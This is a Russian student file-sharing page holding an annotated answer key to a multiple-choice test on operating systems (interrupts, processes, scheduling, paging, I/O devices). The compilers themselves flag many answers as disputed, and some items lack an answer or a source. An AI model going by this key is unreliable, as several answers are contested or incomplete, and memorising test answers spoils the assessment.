Добавил:
Upload Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
коммент по тесту к ОС (все вопросы).doc
Скачиваний:
4
Добавлен:
29.08.2019
Размер:
871.42 Кб
Скачать

Демонстрационный вариант

Ответы к части тестов можно найти путем ввода вопроса в любой поисковик.

Ссылка на тест в интернете (у кого не открывался файл с расширением xps): http://att.nica.ru/index.php?menu=structs_demo&submitaction=structsel&ootype=vuz&subj=159&speckod=230102.65

В некоторых вопросах ответ м.б. выделен курсивом - это вариант И.В.. Мои варианты выделены жирным красным шрифтом. Очень много спорных вопросов и ответов, тест – ужасный. Просьба на спорные вопросы заострить свое внимание, м.б. найдете более подходящую инф-ю. Можете готовиться только по моим ответам, а И.В. иметь ввиду.

Просим отнестись к нашему труду с пониманием, сами находимся не в лучшей ситуации.

ЗАДАНИЕ N 1( - выберите один вариант ответа)

Для сетевых операционных систем характерной является функция обеспечения …

ВАРИАНТЫ ОТВЕТОВ:

  1. прямого доступа к оперативной памяти другого компьютера

  2. Взаимодействия связанных между собой компьютеров

  3. обмена сигналами между выполняющимися на разных компьютерах программами

  4. программных каналов между разными компьютерами

ОТВЕТ: 2

Комментарий (ответ из учебника Гордеева.Глава 1. Основные понятия. Назначение и функции операционных систем):

“…основные функции операционных систем:

Для сетевых операционных систем характерной является функция обеспечения взаимодействия связанных между собой компьютеров...

ЗАДАНИЕ N 2( - выберите один вариант ответа)

Одна операционная система может поддерживать несколько …

ВАРИАНТЫ ОТВЕТОВ:

  1. микропрограммных сред

  2. операционных систем

  3. микропрограммных систем

  4. Операционных сред

ОТВЕТ: 4

Комментарий (ответ из http://nofxsss2007.narod.ru/spo/10.htm):

Операционная среда - системное ПО, в котором могут выполняться программы, созданный по правилам этой среды.

Одна ОС может поддерживать несколько операционных сред. Примером может служить ОС Linux, в которой могут быть созданы условия для выполнения Windows - программ, и наоборот. Или же другой пример: ОС Windows, операционная среда которой может быть 16-ти и 32- битная. Приложения, созданные в 32-битной операционной среде не пойдут в 16-битной, а приложения, созданные в 16-битной пойдут в 32-битной среде.

Операционная среда определяется программным интерфейсом - API - Application Program Interface. API включает в себя управление процессами, памятью и вводом/выводом. Для каждой ОС свой API. Операционная среда может включать несколько интерфейсов, как пользовательских, так и программных:

  • графический интерфейс;

  • интерфейс командной строки.

ЗАДАНИЕ N 3( - выберите один вариант ответа)

Термин "маскирование" означает запрет отдельных …

ВАРИАНТЫ ОТВЕТОВ:

  1. Сигналов прерывания

  2. команд пользователя

  3. процессов пользователя

  4. команд процессора

ОТВЕТ: 1

Комментарий (ответ из учебника Гордеева.Глава 1. Основные понятия.Прерывания.):

Наличие сигнала прерывания не обязательно должно вызывать прерывание исполняющейся программы. Процессор может обладать средствами защиты от прерываний: отключение системы прерываний, маскирование (запрет) отдельных сигналов прерывания.

ЗАДАНИЕ N 4( - выберите один вариант ответа)

Для реализации синхронизации на уровне языка программирования используются высокоуровневые примитивы, названные …

ВАРИАНТЫ ОТВЕТОВ:

  1. супервизорами

  2. мониторами

  3. маркерами

  4. Семафорами

ОТВЕТ: 4

Комментарий (ответ из http://www.software.unn.ru/ccam/multicore/materials/os/MultiCore-OS-Lec4-Concurrency2.pdf):

Семафоры – примитивы синхронизации более высокого уровня абстракции, чем признаки блокировки; предложены Дийкстрой (Dijkstra) в 1968 г. в качестве компонента операционной системы THE

ЗАДАНИЕ N 5( - выберите один вариант ответа)

Относительный путь к файлу состоит из списка каталогов, которые нужно …

ВАРИАНТЫ ОТВЕТОВ:

  1. Пройти от рабочего каталога, чтобы добраться до файла

  2. открыть в корневом процессе, чтобы добраться до файла

  3. добавить в переменную PATH операционной среды

  4. пройти от корневого каталога, чтобы добраться до файла

ОТВЕТ: 1

Комментарий (ответ из http://www.uneex.ru/static/AltDocs_linux_intro/Filesystem_use.html):

Относительный путь начинается от текущего каталога, в то время как полный путь всегда начинается от корневого каталога.

p.s.: текущий каталог это и есть рабочий каталог или почитайте тут (инф-я из Вики: http://ru.wikipedia.org/wiki/%D0%E0%E1%EE%F7%E8%E9_%EA%E0%F2%E0%EB%EE%E3):

Рабочий каталог (англ. working directory, также текущий каталог или текущая директория) процесса — в информатике каталог файловой системы, который используется для нахождения файлов, указанных только по имени либо по относительному пути.

Текущий путь (англ. current path) — в терминологии файловых систем с каталогами, имя каталога, относительно которого производятся операции с относительными именами файлов (каталогов). Текущий путь обычно ассоциирован с процессом (у разных процессов может быть разный текущий путь).

  ЗАДАНИЕ N 6( - выберите один вариант ответа)

Свопингом сегментов называется перемещение …

ВАРИАНТЫ ОТВЕТОВ:

1)

блоков файла между каталогами файловой системы

2)

блоков данных между процессом и ядром операционной системы

3)

сегментов данных между стеком и оперативной памятью

4)

сегментов между оперативной и внешней памятью

ОТВЕТ: 4

Комментарий (ответ из уч.пособия А.С.Деревянко, М.Н.Солощук Операционные системы Глава 3.Управление памятью 3.3. Односегментная модель)

http://khpi-iip.mipk.kharkiv.edu/library/spo/book/i_g03.html):

Перемещение сегментов и (см. ниже) страниц между оперативной и внешней памятью и наоборот называется свопингом (swapping), а составные его части - вытеснением (swap out) и подкачкой (swap in).

  ЗАДАНИЕ N 7( - выберите один вариант ответа)

Идентификатор пользователя представляет собой уникальное _______ значение

ВАРИАНТЫ ОТВЕТОВ:

1)

составное

2)

символьное

3)

вещественное

4)

целое

ОТВЕТ: 4

Комментарий (ответ из http://www.netlib.narod.ru/library/book0010/ch07_04.htm):

Традиционно каждый процесс Unix имеет уникальный идентификатор — целое число в диапазоне от 0 до 32767, которое называется идентификатором процесса (process identifier, PID). Идентификаторы процессов PID 0 и 1 имеют для системы специальной значение; все остальные идентификаторы присваиваются «обычным» процессам.

ЗАДАНИЕ N 8 ( - выберите один вариант ответа) Мультитерминальный режим работы предполагает совмещение …

ВАРИАНТЫ ОТВЕТОВ:

1)

привилегированного режима работы и режима пользователя

2)

многопроцессорного режима работы и режима ввода-вывода

3)

диалогового режима работы и режима мультипрограммирования

4)

аналогового режима работы и режима микропрограммирования

ОТВЕТ: 3

Комментарий (ответ из учебника Гордеева.Глава 1. Основные понятия. Мультипрограммирование, многопользовательский режим работы и режим разделения времени):

Совмещение диалогового режима работы с компьютером и режима мультипрограммирования привело к появлению мулътитерминалъных, или многопользовательских, систем. Организовать параллельное выполнение нескольких задач можно разными способами (более подробно об этом см. в главе 2). Если это осуществляется таким образом, что на каждую задачу поочередно выделяется некий квант времени, после чего процессор передается другой задаче, готовой к продолжению вычислений, то такой режим принято называть режимом разделения времени (time sharing). Системы разделения времени активно развивались в 60-70 годы, и сам термин означал именно мультитерминальную и мультипрограммную систему.

ЗАДАНИЕ N 9( - выберите один вариант ответа)

Последовательная трансляция двух исходных программ является …

ВАРИАНТЫ ОТВЕТОВ:

1)

одним последовательным процессом

2)

двумя одинаковыми процессами

3)

двумя разными процессами

4)

одной последовательной задачей

ОТВЕТ: 3

Комментарий (ответ из ):

 ЗАДАНИЕ N 10( - выберите один вариант ответа)

Идентификатор процесса является частью _____________ процесса.

ВАРИАНТЫ ОТВЕТОВ:

1)

контекста

2)

типа

3)

дескриптора

4)

описателя

ОТВЕТ: 3

Комментарий (ответ из http://www.opennet.ru/soft/proc/1.html):

Системные данные, используемые ядром для идентификации процесса, которые существуют в течение всего времени жизни процесса, образуют дескриптор (описатель) процесса. Множество дескрипторов образуют таблицу процессов. Размер таблицы процессов, хотя и имеет допустимые ограничения, но в современных версиях UNIX позволяет создавать до нескольких сотен процессов. Дескриптор процесса содержит его параметры. Информация о состоянии включает расположение (адрес в памяти), размер выгружаемой части образа процесса, идентификаторы процесса и запустившего его пользователя.

ЗАДАНИЕ N 11 ( - выберите один вариант ответа) В OS UNIX каждый новый процесс может быть образован (порожден) только …

ВАРИАНТЫ ОТВЕТОВ:

1)

двумя из существующих процессов

2)

несколькими родительскими процессами

3)

четным количеством родительских процессов

4)

одним из существующих процессов

ОТВЕТ: 4

Комментарий (ответ из http://technomag.edu.ru/doc/48678.html (ВНУТРЕННЕЕ УСТРОЙСТВО OS UNIX автор: Родионов С.)):

Множество процессов, существующих в каждый момент, образуют единую иерархическую структуру, где они связаны отношениями потомок-предок. Каждый новый процесс может быть образован (порожден) только одним из существующих процессов, который становится его предком. По отношению к предку порожденый процесс будет считаться потомком. Иного способа образования новых процессов и иных отношений между процессами в OS UNIX не предусмотрено. Следует отметить, что любой процесс-предок может иметь более одного потомка.

ЗАДАНИЕ N 12 ( - выберите один вариант ответа) Основное различие между долгосрочным и краткосрочным планированием (диспетчеризацией) заключается в …

ВАРИАНТЫ ОТВЕТОВ:

1)

длительности выполнения

2)

очередности выполнения

3)

скорости выполнения

4)

частоте выполнения

ОТВЕТ: 4

Комментарий (ответ из учебника Гордеева Глава 2.Управление задачами ):

Основное различие между долгосрочным и краткосрочным планировщиками заключается в частоте их запуска, например: краткосрочный планировщик может запускаться каждые 30 или 100 мс, долгосрочный — один раз в несколько минут (или чаще; тут многое зависит от общей длительности решения заданий пользователей).

Долгосрочный планировщик решает, какой из процессов, находящихся во входной очереди, в случае освобождения ресурсов памяти должен быть переведен в очередь процессов, готовых к выполнению. Долгосрочный планировщик выбирает процесс из входной очереди с целью создания неоднородной мультипрограммной смеси. Это означает, что в очереди готовых к выполнению процессов должны находиться в разной пропорции как процессы, ориентированные на ввод-вывод, так и процессы, ориентированные преимущественно на активное использование центрального процессора.

Краткосрочный планировщик решает, какая из задач, находящихся в очереди готовых к выполнению, должна быть передана на исполнение. В большинстве современных операционных систем, с которыми мы сталкиваемся, долгосрочный планировщик отсутствует.

ЗАДАНИЕ N 13 ( - выберите один вариант ответа) Приоритет, меняющийся во время исполнения процесса, называется _____________ приоритетом.

ВАРИАНТЫ ОТВЕТОВ:

1)

фиксированным

2)

циклическим

3)

статическим

4)

динамическим

ОТВЕТ: 4

Комментарий (ответ из http://www.netlib.narod.ru/library/book0010/ch07_03.html (книга Ядро Linux в комментариях автор: Скотт Максвелл)):

Процессы не реального времени имеют два различных вида приоритетов: статический приоритет и динамический приоритет. Процессы реального времени добавляют третий вид приоритета — приоритет реального времени. Приоритеты — это просто целочисленные значения, выражающие относительный вес, который должен быть присвоен процессу при определении того, какому процессу должно быть выделено определенное время центрального процессора. Чем выше приоритет процесса, тем выше его шансы получить доступ к процессору.

  • Статический приоритет. Этот приоритет называется статическим, поскольку не изменяется с течением времени и может быть изменен только явно пользователем. Он указывает максимальный размер временного кванта, который может быть выделен процессу, прежде чем другим процессам будет разрешено конкурировать за доступ к процессору. (По каким-либо другим причинам процесс может быть вынужден освободить процессор и до истечения этого интервала.)

  • Динамический приоритет. Этот приоритет снижается с течением времени, пока процесс используется время процессора; когда его значение падает ниже 0, процесс помечается для повторного планирования. Это значение указывает остаток времени данного временного кванта.

  • Приоритет реального времени. Этот приоритет показывает, какие другие процессы данный процесс побеждает в соревновании за время центрального процессора: более высокие значения всегда побеждают более низкие.

ЗАДАНИЕ N 14 ( - выберите один вариант ответа) При совместном использовании процессами аппаратных и информационных ресурсов вычислительной системы возникает потребность в …

ВАРИАНТЫ ОТВЕТОВ:

1)

адаптации

2)

синхронизации

3)

оптимизации

4)

буферизации

ОТВЕТ: 2

Комментарий (ответ из http://elforcer.ucoz.ru/forum/4-518-1):

Существует достаточно обширный класс средств операционной системы, с помощью которых обеспечивается взаимная синхронизация процессов и потоков. Потребность в синхронизации потоков возникает только в мультипрограммной операционной системе и связана с совместным использованием аппаратных и информационных ресурс об вычислительной системы. Синхронизация необходима для исключения гонок и тупиков при обмене данными между потоками, разделении данных, при доступе к процессору и устройствам ввода-вывода.

ЗАДАНИЕ N 15 ( - выберите один вариант ответа) В операционной системе UNIX сигналы можно рассматривать как простейшую форму взаимодействия между …

ВАРИАНТЫ ОТВЕТОВ:

1)

процессами

2)

процессорами

3)

сегментами

4)

каналами

ОТВЕТ: 1

Комментарий (ответ из http://library.tuit.uz/lectures/it/Operatsionniye_sistemi.htm):

Если рассматривать выполнение процесса на виртуальном компьютере, который предоставляется каждому пользователю, то в такой системе должна существовать система прерываний, отвечающая стандартным требованиям:

  • обработка исключительных ситуаций;

  • средства обработки внешних и внутренних прерываний;

  • средства управления системой прерываний (маскирование и демаскирование).

Всем этим требованиям в UNIX отвечает механизм сигналов, который позволяет не только воспринимать и обрабатывать сигналы, но и порождать их и посылать на другие машины (процессы). Сигналы могут быть синхронными, когда инициатор сигнала — сам процесс, и асинхронными, когда инициатор сигнала — интерактив­ный пользователь, сидящий за терминалом. Источником асинхронных сигналов может быть также ядро, когда оно контролирует определенные состояния аппара­туры, рассматриваемые как ошибочные.

Сигналы можно рассматривать как простейшую форму взаимодействия между про­цессами. Они используются для передачи от одного процесса другому или от ядра ОС какому-либо процессу уведомления о возникновении определенного события.

ЗАДАНИЕ N 16 ( - выберите несколько вариантов ответа) Область эффективного применения событийного программирования начинается там, где возникают …

ВАРИАНТЫ ОТВЕТОВ:

1)

трудности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы

2)

возможности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы

3)

необходимость использования графа перехода между состояниями

4)

неудобство использования графа переходов между состояниями

ОТВЕТ: 4 и д.б. еще какой-то

Комментарий (ответ из книги Непейвода H.H., Скопин И.Н. Основания программирования http://www.oraclub.ru/bookinfo-nepeyvoda-nn/nepeyvoda-nn-programmirovanie-razdel-1.html?start=116):

Область эффективного применения событийного стиля программирования начинается именно там, где становится неудобным использовать граф перехода между состояниями.

Стиль событийного программирования — это создание для каждого собы­тия собственной процедуры обработчика. Порядок, в котором обработчики описываются в программе, не имеет никакого значения. Более того, они могут, а во многих случаях и должны быть приписаны к разным структур­ным единицам программы, в рамках которых только и осмыслена реакция на событие. Как следствие, продуктивно разбивать реакцию на событие на части, за которые отвечают такие структурные единицы, и иметь несколько реакций (разных) структурных единиц на одно событие.

ЗАДАНИЕ N 17 ( - выберите один вариант ответа) Два параллельных процесса могут быть …

ВАРИАНТЫ ОТВЕТОВ:

1)

взаимоисключающими

2)

независимыми

3)

критическими

4)

коммутационными

ОТВЕТ: 2

Комментарий (ответ из http://e-book.narod.ru/text/tr21.htm):

Последовательные процессы, исполнение которых хотя бы частично перекрывается по времени, являются параллельными. Два параллельных процесса могут быть независимыми либо взаимодействующими. Независимыми являются процессы, которые работают на независимых множествах переменных. На результат исполнения такого процесса не влияет работа независимого от него процесса, так как последний никак не может изменить значения переменных первого. Взаимодействующие процессы совместно используют переменные, и выполнение одного влияет на результат другого. “Переменные” в этом контексте требуют более широкой интерпретации; к ним могут относиться файлы данных, а также ячейки оперативной памяти, сопоставленные переменным программы на исходном языке.

ЗАДАНИЕ N 18 ( - выберите один вариант ответа) Главной целью мультипрограммирования в системах пакетной обработки является …

ВАРИАНТЫ ОТВЕТОВ:

1)

обеспечение удобства работы пользователей

2)

минимизация простоев всех устройств компьютера

3)

минимизация времени выполнения одной задачи

4)

обеспечение реактивности системы

ОТВЕТ: 2

Комментарий (ответ из http://www.rus-lib.ru/book/28/prog/10/087-161.htm):

Мультипрограммирование, или многозадачность (multitasking) — это способ организации вычислительного процесса, при котором на одном процессоре попеременно выполняются сразу несколько программ. Эти программы совместно используют не только процессор, но и другие ресурсы компьютера, оперативную и внешнюю память, устройства ввода-вывода, данные. Мультипрограммирование призвано повысить эффективность использования вычислительной системы, однако эффективность может пониматься по-разному. Наиболее характерными критериями эффективности вычислительных систем являются:

· пропускная способность — количество задач, выполняемых вычислительной системой в единицу времени;

· удобство работы пользователей, заключающееся, в частности, в том, что они имеют возможность интерактивно работать одновременно с несколькими приложениями на одной машине;

· реактивность системы — способность системы выдерживать заранее заданные (возможно, очень короткие) интервалы времени между запуском программы и получением результата.

В зависимости от выбранного критерия эффективности ОС делятся на системы пакетной обработки, системы разделения времени и системы реального времени. Каждый тип ОС имеет специфические внутренние механизмы и особые области применения. Некоторые операционные системы могут поддерживать одновременно несколько режимов, например часть задач может выполняться в режиме пакетной обработки, а часть — в режиме реального времени или в режиме разделения времени.

Мультипрограммирование в системах пакетной обработки

При использовании мультипрограммирования для повышения пропускной способности компьютера главной целью является минимизация простоев всех устройств компьютера, и прежде всего центрального процессора. Такие простои могут возникать из-за приостановки задачи по ее внутренним причинам, связанным, например, с ожиданием ввода данных для обработки. Данные могут храниться на диске или же поступать от пользователя, работающего за терминалом, а также от измерительной аппаратуры, установленной на внешних технических объектах. При возникновении такого рода блокировки выполняемой задачи естественным решением, ведущим к повышению эффективности использования процессора, является переключение процессора на выполнение другой задачи, у которой есть данные для обработки. Такая концепция мультипрограммирования положена в основу так называемых пакетных систем.

Мультипрограммирование в системах разделения времени

В системах разделения времени пользователям (или одному пользователю) предоставляется возможность интерактивной работы сразу с несколькими приложениями. Для этого каждое приложение должно регулярно получать возможность «общения» с пользователем. Понятно, что в пакетных системах возможности диалога пользователя с приложением весьма ограничены….

…критерием эффективности систем разделения времени является не максимальная пропускная способность, а удобство и эффективность работы пользователя. Вместе с тем мультипрограммное выполнение интерактивных приложений повышает и пропускную способность компьютера (пусть и не в такой степени, как пакетные системы). Аппаратура загружается лучше, поскольку в то время, пока одно приложение ждет сообщения пользователя, другие приложения могут обрабатываться процессором.

Мультипрограммирование в системах реального времени

Еще одна разновидность мультипрограммирования используется в системах реального времени, предназначенных для управления от компьютера различными техническими объектами (например, станком, спутником, научной экспериментальной установкой и т. д.) или технологическими процессами (например, гальванической линией, доменным процессом и т. п.). Во всех этих случаях существует предельно допустимое время, в течение которого должна быть выполнена та или иная управляющая объектом программа. В противном случае может произойти авария: спутник выйдет из зоны видимости, экспериментальные данные, поступающие с датчиков, будут потеряны, толщина гальванического покрытия не будет соответствовать норме. Таким образом, критерием эффективности здесь является способность выдерживать заранее заданные интервалы времени между запуском программы и получением результата (управляющего воздействия). Это время называется временем реакции системы, а соответствующее свойство системы — реактивностью. Требования ко времени реакции зависят от специфики управляемого процесса. Контроллер робота может требовать от встроенного компьютера ответ в течение менее 1 мс, в то время как при моделировании полета может быть приемлем ответ в 40 мс.

В системах реального времени мультипрограммная смесь представляет собой фиксированный набор заранее разработанных программ, а выбор программы на выполнение осуществляется по прерываниям (исходя из текущего состояния объекта) или в соответствии с расписанием плановых работ (более подробное описание темы - см. ссылку в начале комментария).

ЗАДАНИЕ N 19 ( - выберите один вариант ответа) Учет участков свободной памяти с помощью связного списка свободных/занятых блоков позволяет …

ВАРИАНТЫ ОТВЕТОВ:

1)

находить в памяти наиболее долго занятые участки

2)

выделять участки памяти произвольных размеров

3)

освобождать память, занятую неактивными процессами

4)

перемещать процессы в памяти

ЗАДАНИЕ N 20 ( - выберите один вариант ответа) Использование виртуальной памяти в однопрограммном режиме приводит к … процесса, если размер программы существенно больше объема доступной оперативной памяти

ВАРИАНТЫ ОТВЕТОВ:

1)

аварийному завершению

2)

ускорению

3)

замедлению выполнения

4)

перезапуску

ОТВЕТ: 1

Комментарий (ответ из http://isit.hut.ru/evm/3.html):

В однопрограммном режиме единственная программа загружается в основную память компьютера, после чего она выполняется до конца или до получения команды на прекращение счета. В однопрограммном режиме в любой момент времени работает только одно устройство компьютера – процессор или периферийное оборудование, а остальные простаивают в ожидании окончания предшествующего этапа обработки. Т.о., однопрограммный режим характеризуется низким коэффициентом загрузки оборудования. В результате этого производительность компьютера оказывается невысокой и медленно растет с увеличение быстродействия процесса. Поэтому однопрограммный режим работы приводит к большим потерям эффективности из-за недоиспользования устройств, входящих в вычислительный комплекс.

http://www.studarhiv.ru/dir/cat32/subj120/file1237/view1237.html

Размер программ в обычном случае ограничивается емкостью имеющейся основной памяти

ЗАДАНИЕ N 21 ( - выберите несколько вариантов ответа) Виртуальная память позволяет …

ВАРИАНТЫ ОТВЕТОВ:

1)

отказаться от предоставления прикладным процессам оперативной памяти

2)

загружать множество небольших программ, суммарный объем которых больше объема физической памяти

3)

загружать программы, размер которых превышает объем доступной физической памяти

4)

загружать программы, скомпилированные для другого процессора

ОТВЕТ: 2,3

Комментарий (ответ из http://sergeev.sebastopol.ua/ostema08.html):

Виртуальная память

Виртуальная память - это совокупность программно-аппаратных средств, позволяющих пользователям писать программы, размер которых превосходит имеющуюся оперативную память; для этого виртуальная память решает следующие задачи:

  • размещает данные в запоминающих устройствах разного типа, например, часть программы в оперативной памяти, а часть на диске;

  • перемещает по мере необходимости данные между запоминающими устройствами разного типа, например, подгружает нужную часть программы с диска в оперативную память;

  • преобразует виртуальные адреса в физические

Все эти действия выполняются автоматически, без участия программиста, то есть механизм виртуальной памяти является прозрачным по отношению к пользователю

Особенности виртуальной памяти

  • Виртуальная память позволяет адресовать пространство, гораздо большее, чем емкость физической памяти конкретной вычислительной машины

  • В соответствии с принципом локальности для реальных программ обычно нет необходимости в помещении их в физическую память целиком

  • Возможность выполнения программы, находящейся в памяти лишь частично, обеспечивает ряд преимуществ

  1. Программа не ограничена размером ОП; упрощается разработка программ, поскольку можно задействовать большие виртуальные пространства, не заботясь о размере используемой памяти

  2. Возможность частичного помещения программы (процесса) в память и гибкого перераспределения памяти между программами позволяет разместить в памяти больше программ, что увеличивает загрузку процессора и пропускную способность системы

  3. Объем ввода-вывода для выгрузки части программы на диск может быть меньше, чем при свопинге, и поэтому каждая программа будет работать быстрее

ЗАДАНИЕ N 22 ( - выберите один вариант ответа) Сегментная организация памяти … отдельно скомпилированных процедур.

ВАРИАНТЫ ОТВЕТОВ:

1)

состоит из

2)

упрощает компоновку

3)

невозможна без

4)

усложняет компоновку

ОТВЕТ: 2

Комментарий (ответ из http://www.intuit.ru/department/os/modernos/class/free/6/5.html):

…Помимо простоты управления увеличивающимися или сокращающимися структурами данных, сегментированная память обладает и другими преимуществами.

К ним относятся:

  • простота компоновки отдельно скомпилированных процедур (обращение к начальной точке процедуры осуществляется адресом вида (n,0), где n – номер сегмента);

  • легкость обеспечения дифференцируемого доступа к различным частям программы (например, запретить обращаться для записи в сегмент программы);

  • простота организации совместного использования фрагментов программ различными процессами, например, библиотеки совместного доступа могут быть оформлены в виде отдельного сегмента, который может быть включен в виртуальное адресное пространство нескольких процессов.

Ответы с 23-26 взяты из файла И.В. (их не успела проверить):

ЗАДАНИЕ N 23 ( - выберите один вариант ответа) При страничной организации памяти таблица страниц может размещаться в …

ВАРИАНТЫ ОТВЕТОВ:

1)

только в оперативной памяти

2)

в оперативной памяти и на диске

3)

только в процессоре

4)

в специальной быстрой памяти процессора и в оперативной памяти

ОТВЕТ: 2

Комментарий (ответ из http://vv303.narod.ru/files/inst/olifer/chapter5/default.htm)

Из файла Изольды Валерьевны:

Размер страницы влияет также на количество записей в таблицах страниц. Чем меньше страница, тем более объемными являются таблицы страниц процессов и тем больше места они занимают в памяти. Учитывая, что в современных процессорах максимальный объем виртуального адресного пространства процесса, как правило, не меньше 4 Гбайт (232), то при размере страницы 4 Кбайт (212) и длине записи 4 байта для хранения таблицы страниц может потребоваться 4 Мбайт памяти! Выходом в такой ситуации является хранение в памяти только той части таблицы страниц, которая активно используется в данный период времени — так как сама таблица страниц хранится в таких же страницах физической памяти, что и описываемые ею страницы, то принципиально возможно временно вытеснять часть таблицы страниц из оперативной памяти.

ЗАДАНИЕ N 24 ( - выберите один вариант ответа) Страничная организация предназначена для …

ВАРИАНТЫ ОТВЕТОВ:

1)

облегчения совместного использования процедур, библиотек и массивов данных

2)

повышения уровня защиты программ и данных

3)

получения большого адресного пространства без приобретения дополнительной физической памяти

4)

логического разделения программ и данных

ОТВЕТ : 1

Сегментно-страничная и страничная организация памяти позволяет легко организовать совместное использование одних и тех же данных и программного кода разными задачами.

ЗАДАНИЕ N 25 ( - выберите один вариант ответа) При страничном сбое и отсутствии свободных блоков физической памяти операционная система должна …

ВАРИАНТЫ ОТВЕТОВ:

1)

выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске

2)

выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске, если она претерпела изменения

3)

выбрать страницу, которая не изменялась, и сохранить удаляемую страницу на диске

4)

выбрать страницу-кандидат на удаление из памяти и сохранить копию удаляемой страницы в таблице страниц

ОТВЕТ : 2

После того, как выбрана страница, которая должна покинуть оперативную память, анализируется ее признак модификации (из таблицы страниц). Если выталкиваемая страница с момента загрузки была модифицирована, то ее новая версия должна быть переписана на диск. Если нет, то она может быть просто уничтожена, то есть соответствующая физическая страница объявляется свободной.

ЗАДАНИЕ N 26 ( - выберите один вариант ответа) Полная реализация алгоритма LRU (Least Recently Used) …

ВАРИАНТЫ ОТВЕТОВ:

1)

теоретически невозможна

2)

возможна при использовании стековой организации таблицы страниц

3)

возможна при условии построения таблицы страниц в виде бинарных деревьев

4)

практически невозможна

ОТВЕТ : 2

Основная проблема least recently used (LRU) - реализация.

Необходимо иметь связанный список всех страниц в памяти, в начале которого будут часто используемые страницы.

Причем он должен обновляться при каждой ссылке. Много времени нужно на поиск страниц в списке. Есть вариант реализации со специальным устройством. Например, - иметь 64-битный указатель, который автоматически увеличивается на 1 после каждой инструкции и в таблице страниц иметь соответствующее поле, в которое заносится значение указателя при каждой ссылке на страницу. При возникновении page fault'а выгружается страница с наименьшим указателем.

Как оптимальный алгоритм, так и LRU не страдают от аномалии Белейди (определенные последовательности обращений к страницам приводят в действительности к увеличению числа страничных нарушений при увеличении кадров, выделенных процессу). Существует класс алгоритмов, называемых стековыми (stack) алгоритмами, которые не проявляют аномалии Белейди.

ЗАДАНИЕ N 27 ( - выберите один вариант ответа) Запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы получает _____________ ввода-вывода.

ВАРИАНТЫ ОТВЕТОВ:

1)

контроллер

2)

диспетчер

3)

супервизор

4)

процессор

ОТВЕТ: 3

Комментарий (ответ из книги Гордеева http://tid.com.ua/tid1/addonres.php?id=4729 или см.материал к 4-й теме для подготовки к тесту):

управление вводом-выводом осуществляется компонентом операционной системы, который часто называют супервизором ввода-вывода.

ЗАДАНИЕ N 28 ( - выберите один вариант ответа) Мыши (в качестве устройства-указателя) относятся к _____________ устройствам ввода-вывода.

ВАРИАНТЫ ОТВЕТОВ:

1)

позиционируемым

2)

символьным

3)

адресуемым

4)

блочным

ОТВЕТ: 2

Комментарий

Источник 1. ответ из.материала к 4-й теме для подготовки к тесту:

Блочные и символьные устройства

Типичный пример блочного устройства(или блок-ориентированного) – устройство управления дисками. Оно выполняет команды вида: read, write, seek (считать, записать или найти блок с заданным номером). Устройство может выполнять чистый ввод-вывод или доступ к файловой системе. Имеется возможность доступа к файлу, отображаемому в память.

Типичные примеры символьных устройств (иногда называют байт-ориентированными) – клавиатура, мышь, последовательные порты. Такие устройства выполняют команды вида: get, put (считать или записать символ). Библиотеки верхнего уровня в операционной системе для символьных устройств допускают построчное редактирование посимвольно введенной информации.

Источник 2: http://citforum.ru/operating_systems/sos/glava_9.shtml#_2_4

Физическая организация устройств ввода-вывода

Устройства ввода-вывода делятся на два типа: блок-ориентированные устройства(или блочные) и байт-ориентированные(или символьные) устройства. Блок-ориентированные устройства хранят информацию в блоках фиксированного размера, каждый из которых имеет свой собственный адрес. Самое распространенное блок-ориентированное устройство - диск. Байт-ориентированные устройства не адресуемы и не позволяют производить операцию поиска, они генерируют или потребляют последовательность байтов. Примерами являются терминалы, строчные принтеры, сетевые адаптеры. Однако некоторые внешние устройства не относятся ни к одному классу, например, часы, которые, с одной стороны, не адресуемы, а с другой стороны, не порождают потока байтов. Это устройство только выдает сигнал прерывания в некоторые моменты времени.

Внешнее устройство обычно состоит из механического и электронного компонента. Электронный компонент называется контроллером устройства или адаптером. Механический компонент представляет собственно устройство. Некоторые контроллеры могут управлять несколькими устройствами. Если интерфейс между контроллером и устройством стандартизован, то независимые производители могут выпускать совместимые как контроллеры, так и устройства.

Операционная система обычно имеет дело не с устройством, а с контроллером. Контроллер, как правило, выполняет простые функции, например, преобразует поток бит в блоки, состоящие из байт, и осуществляют контроль и исправление ошибок. Каждый контроллер имеет несколько регистров, которые используются для взаимодействия с центральным процессором. В некоторых компьютерах эти регистры являются частью физического адресного пространства. В таких компьютерах нет специальных операций ввода-вывода. В других компьютерах адреса регистров ввода-вывода, называемых часто портами, образуют собственное адресное пространство за счет введения специальных операций ввода-вывода (например, команд IN и OUT в процессорах i86).

ОС выполняет ввод-вывод, записывая команды в регистры контроллера. Например, контроллер гибкого диска IBM PC принимает 15 команд, таких как READ, WRITE, SEEK, FORMAT и т.д. Когда команда принята, процессор оставляет контроллер и занимается другой работой. При завершении команды контроллер организует прерывание для того, чтобы передать управление процессором операционной системе, которая должна проверить результаты операции. Процессор получает результаты и статус устройства, читая информацию из регистров контроллера.

ЗАДАНИЕ N 29 ( - выберите один вариант ответа) Любые операции по управлению вводом-выводом объявляются …

ВАРИАНТЫ ОТВЕТОВ:

1)

привилегированными

2)

универсальными

3)

приоритетными

4)

уникальными

ОТВЕТ: 1

Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту):

самым главным является следующий принцип: любые операции по управлению вводом-выводом объявляются привилегированными и могут выполняться только кодом самой операционной системы. Для обеспечения этого принципа в большинстве процессоров даже вводятся режимы пользователя и супервизора. Последний еще называют привилегированным режимом, или режимом ядра. Как правило, в режиме супервизора выполнение команд ввода-вывода разрешено, а в пользовательском режиме — запрещено.

ЗАДАНИЕ N 30 ( - выберите один вариант ответа) Супервизор ввода-вывода инициирует операции ввода-вывода и в случае управления вводом-выводом с использованием прерываний предоставляет процессор …

ВАРИАНТЫ ОТВЕТОВ:

1)

супервизору прерываний

2)

диспетчеру задач

3)

задаче пользователя

4)

супервизору программ

ОТВЕТ: 2

Комментарий (ответ из учебника Гордеева или см..материал к 4-й теме для подготовки к тесту):

Перечислим основные задачи, возлагаемые на супервизор.

